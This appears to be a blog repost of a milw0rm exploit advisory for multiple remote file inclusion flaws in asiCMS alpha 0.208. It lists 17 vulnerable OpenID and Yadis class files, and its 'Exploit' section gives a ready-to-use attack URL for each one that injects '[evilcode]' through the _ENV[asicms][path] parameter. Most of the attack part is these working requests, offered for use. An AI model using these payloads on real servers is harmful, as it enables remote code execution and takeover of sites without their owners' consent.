LFI to RCE via access_log injection

on
18

asiCMS alpha 0.208 - Multiple RFI

on 


[o] asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerability
Software : asiCMS version alpha 0.208
Vendor   : http://asicms.sourceforge.net/
Download : http://sourceforge.net/project/showfiles.php?group_id=203457
Author   : NoGe


[o] Vulnerable file
classes/Auth/OpenID/Association.php
classes/Auth/OpenID/BigMath.php
classes/Auth/OpenID/DiffieHellman.php
classes/Auth/OpenID/DumbStore.php
classes/Auth/OpenID/Extension.php
classes/Auth/OpenID/FileStore.php
classes/Auth/OpenID/HMAC.php
classes/Auth/OpenID/MemcachedStore.php
classes/Auth/OpenID/Message.php
classes/Auth/OpenID/Nonce.php
classes/Auth/OpenID/SQLStore.php
classes/Auth/OpenID/SReg.php
classes/Auth/OpenID/TrustRoot.php
classes/Auth/OpenID/URINorm.php
classes/Auth/Yadis/XRDS.php
classes/Auth/Yadis/XRI.php
classes/Auth/Yadis/XRIRes.php
All the file is affected by _ENV[asicms][path] variable


[o] Exploit
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=[evilcode]
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=[evilcode]


[o] Publish
http://milw0rm.com/exploits/6685


Comments

labatterie said…
Thanks for your blog,
December 2, 2010 at 9:08 PM
Post a Comment